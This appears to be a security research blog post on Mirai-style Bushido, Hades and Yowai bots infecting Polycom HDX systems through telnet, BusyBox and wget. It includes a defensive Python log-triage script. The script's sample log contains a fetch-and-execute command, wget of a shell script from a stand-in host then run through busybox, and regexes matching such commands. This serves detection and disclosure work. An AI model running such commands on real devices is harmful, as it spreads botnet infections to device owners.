Infections Die Hard: WootCloud Detects Polycom HDX Systems Infected with Bushido, Hades and Yowai Bots
The WootCloud Research team has a mission to help enterprises and security firms detect new threats that exist in the rapidly expanding IoT ecosystem. Over the past 12 months, we have identified and ethically disclosed multiple new threats, including the recent OMNI botnet attacking Polycom devices.
Our latest research uncovered the presence of three new botnet families on Polycom HDX systems, all of them mimicking the behavior of the Mirai botnet. WootCloud detected the infections in the Asia region. The malware families are the Bushido, Hades and Yowai bots.
In late 2018, WootCloud worked in collaboration with the Polycom security team to unveil botnet infections affecting Polycom HDX systems, identifying an OMNI bot that was deployed in the wild on Polycom HDX conference systems. Polycom also released an advisory on handling the OMNI bot infections. In this report, the WootCloud Research Team highlights additional exploits that attackers are still using in the wild to abuse these devices.
IoT Infection Model
The Polycom HDX systems are used for launching attacks as shown below:
- The first step is for the attacker to detect vulnerable Polycom systems on the Internet
- Vulnerable systems can be characterized as:
  - Exposed on the Internet
  - Configured with default settings and weak passwords
  - Running multiple remote management interfaces such as Telnet, web, etc. with weak authorization and authentication controls
  - Deployed with obsolete firmware prone to vulnerabilities
- The attackers then scan the networks to enumerate the Polycom systems reachable on the Internet. The scans can be initiated using specific signatures to fingerprint the hosts running Polycom systems
- The attackers exploit the inherent vulnerability or configuration flaw to embed the malicious payload in the Polycom system
- The attackers then utilize the embedded system utilities such as telnet, busybox, wget, etc. to perform unauthorized operations from the compromised Polycom system
- The attackers then launch attacks such as DDoS, brute-force, password cracking and others to gain access to other available systems
- The primary motive of the attackers is to build a pool of compromised hosts, termed bots, forming a network of bots that is operated by the attackers
- The generated botnets can be used for nefarious activities on the Internet
The following sections briefly discuss the IoT bots in question.
WootCloud started the analysis by targeting audio-video conferencing devices. During the investigation, we noted that Polycom’s audio-video conferencing systems are not only pervasive in the enterprise, but are frequently left running in insecure states, reachable from the Internet. Because of the role these devices play in the enterprise, they are not usually considered in a typical security or risk scan. Unfortunately, in today’s environment, any exposed interface, unpatched embedded firmware, or unauthenticated service is a prime target for malware that preys on embedded Linux/Unix systems.
To identify new exploits, WootCloud performed an in-depth analysis of the compromised Polycom HDX systems. Generally, these systems have a built-in debug interface that records the activities that occurred on the device in log format. The debug flags have to be enabled in the configuration settings so that the device logs all the messages. WootCloud then performed log analysis and forensics on the infected machines to detect threats. A number of Polycom devices were found to be running the discovered bots (Bushido, Hades, and Yowai), which performed brute-force and password cracking operations from the device via the telnet interface.
It has been noticed that the Polycom devices are shipped with binaries such as BusyBox, Wget, and others. The presence of these binaries on the device itself gives an attacker the capability to launch operations stealthily without downloading additional binaries from the C&C server. In particular, these three bots make extensive use of BusyBox, Wget, and similar binaries to perform different sets of operations. WootCloud detected the bots using these binaries to execute specific commands, such as fetching malicious payloads from remote locations using “wget” and then executing those payloads via “busybox”.
The brute-force attack execution by the Bushido, Hades and Yowai bots is discussed below:
Bushido infections were first seen in late 2018. The primary purpose of this botnet family is to generate a network of compromised IoT devices and use them as launchpads to trigger different sets of attacks, which include but are not limited to: Distributed Denial of Service (DDoS), brute-forcing accounts, exploiting vulnerabilities, and others. Bushido evolved from Mirai and inherited a number of Mirai’s features and characteristics. Figure 1 shows the active brute-force attack launched from the compromised Polycom HDX system by the Bushido IoT bot.
The brute-force attack launched by Bushido is detected via the DEBUG logs generated by the compromised Polycom device. The attack is dissected below:
- The BUSHIDO bot triggers the “enable” command
- After that, the “system” command is executed
- Once the “system” command is executed, the “sh” command is triggered to obtain shell access so that the specific payload can be executed
- After entering the shell with “sh”, the BUSHIDO bot calls its main functions by invoking “/bin/busybox” with the BUSHIDO tag as “/bin/busybox BUSHIDO”
If the DEBUG logs are dissected in detail, it can be noticed that the “appcom:ap_command”, “appcom:legacy_api_command” and “appcom:java_api_command” entries primarily belong to the AVC binary.
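The detection described above can be turned into a small log triage routine. The following is an added example, not code from WootCloud or Polycom: it walks a set of constructed DEBUG lines (the line format, the `src=` field and the addresses are assumptions; only the `appcom:*` labels, the enable/system/sh/busybox sequence and the wget-then-busybox pattern come from this write-up), tracks the escalation chain per source, and flags the Mirai-style `/bin/busybox <TAG>` probe as well as fetch-and-execute commands that reuse the device’s own binaries.

```python
import re
from collections import defaultdict

# Constructed sample DEBUG lines. The real Polycom HDX debug format is not
# reproduced here; only the appcom:* source labels and the command sequence
# are taken from the write-up. Addresses are RFC 5737 documentation ranges
# and the payload host uses the reserved .invalid TLD.
SAMPLE_LOG = """\
2019-01-15 10:22:31 DEBUG appcom:ap_command src=203.0.113.7 cmd="enable"
2019-01-15 10:22:31 DEBUG appcom:ap_command src=203.0.113.7 cmd="system"
2019-01-15 10:22:32 DEBUG appcom:legacy_api_command src=203.0.113.7 cmd="sh"
2019-01-15 10:22:32 DEBUG appcom:java_api_command src=203.0.113.7 cmd="/bin/busybox BUSHIDO"
2019-01-15 10:22:35 DEBUG appcom:java_api_command src=203.0.113.7 cmd="cd /tmp; wget http://payload.invalid/p.sh; /bin/busybox sh p.sh"
2019-01-15 10:40:02 DEBUG appcom:ap_command src=192.0.2.10 cmd="enable"
2019-01-15 10:40:05 DEBUG appcom:ap_command src=192.0.2.10 cmd="status"
2019-01-15 11:01:00 DEBUG appcom:ap_command src=198.51.100.4 cmd="/bin/busybox HADES"
"""

# Assumed line layout: "<date> <time> DEBUG appcom:<api> src=<ip> cmd="<text>""
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) DEBUG (?P<source>appcom:\w+) src=(?P<src>\S+) cmd="(?P<cmd>.*)"$'
)

# The escalation chain the bot walks before it reaches a shell.
PROBE_CHAIN = ("enable", "system", "sh")

# Mirai-style probe "/bin/busybox <TAG>": TAG is an upper-case token that is
# not a BusyBox applet; the bot uses the resulting error reply to confirm that
# BusyBox exists. The tag names the family (BUSHIDO, HADES, YOWAI, ...).
BUSYBOX_TAG_RE = re.compile(r"^/bin/busybox\s+([A-Z][A-Z0-9_]{2,})\s*$")
# Payload retrieval plus execution through the device's own binaries.
FETCH_RE = re.compile(r"\b(wget|tftp|curl)\b")
EXEC_RE = re.compile(r"/bin/busybox\s+sh\b|\bchmod\s+\+x\b")


def parse_line(line):
    """Return the fields of one DEBUG line as a dict, or None if unrecognised."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(log_text):
    """Scan the log once and return (src, kind, detail) findings in log order.

    kind is one of:
      shell_probe    - enable -> system -> sh -> "/bin/busybox TAG" from one source
      busybox_tag    - a "/bin/busybox TAG" probe seen without the full chain
      fetch_and_exec - wget/tftp/curl combined with a busybox or chmod execution
    """
    progress = defaultdict(int)  # src -> number of PROBE_CHAIN steps completed
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # unrelated or malformed line
        src, cmd = rec["src"], rec["cmd"].strip()

        # 1. Busybox tag probe, scored higher when the whole chain preceded it.
        tag = BUSYBOX_TAG_RE.match(cmd)
        if tag:
            kind = "shell_probe" if progress[src] == len(PROBE_CHAIN) else "busybox_tag"
            findings.append((src, kind, tag.group(1)))
            progress[src] = 0
        elif progress[src] < len(PROBE_CHAIN) and cmd == PROBE_CHAIN[progress[src]]:
            progress[src] += 1  # next expected step of enable/system/sh
        elif progress[src] < len(PROBE_CHAIN):
            progress[src] = 0  # an unrelated command breaks the chain

        # 2. Fetch-and-execute using binaries already present on the device.
        if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
            findings.append((src, "fetch_and_exec", cmd))
    return findings


def sources_by_kind(findings):
    """Group finding kinds per source address for a quick triage summary."""
    summary = defaultdict(set)
    for src, kind, _ in findings:
        summary[src].add(kind)
    return dict(summary)


if __name__ == "__main__":
    for src, kind, detail in detect(SAMPLE_LOG):
        print(f"{src:15} {kind:15} {detail}")
```

A source that completes the full enable/system/sh chain and then issues the busybox tag probe is reported as `shell_probe`; a bare tag probe from a source that never walked the chain is still reported (`busybox_tag`) because the tag alone identifies the family. A legitimate operator who runs `enable` followed by an ordinary command never advances past the first step.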
Hades is another bot that works on the same paradigm. There has been a “Hades” ransomware release in the wild as well, and the “Hades” name has also been associated with an Advanced Persistent Threat (APT) group. From a technical perspective, this IoT bot is regarded as an advanced version of the Mirai bot and is expected to inherit some functionality from the Mirai source code. Figure 2 shows the active brute-force attack launched from the compromised Polycom HDX system by the Hades IoT bot.
Yowai is a Japanese word that means fragile or brittle. Yowai is also treated as a variant of Mirai, considering its characteristics and methods of infection. Figure 3 shows the active brute-force attack launched from the compromised Polycom HDX system by the Yowai IoT bot.
The log analysis and forensics performed on the compromised devices highlight the presence of the discovered bot infections (Bushido, Hades, Yowai) on the Polycom HDX devices. The attackers are harnessing open-source software packages such as “BusyBox”, “Wget”, and others that ship with the embedded firmware of the Polycom devices. Compromised Polycom devices are used to launch brute-force attacks and potential DDoS attacks, and have also been used as proxy devices for routing malicious communications such as Command and Control (C&C). APIs supported by Polycom devices are abused by the attackers to perform unauthorized operations on the device.
Under responsible disclosure guidelines, the findings have been reported to the Polycom Security team. Polycom has released the associated bulletin highlighting the best security practices to reduce the impact of the Bushido/Hades bots and to handle infections accordingly. The bulletin can be fetched at:
- Security center
- Security bulletin
The WootCloud Research Team would like to extend a sincere thanks to the Polycom security team for their open collaboration on this bulletin and their rapid response to release clear guidelines for customers to detect and prevent these and future bot infections.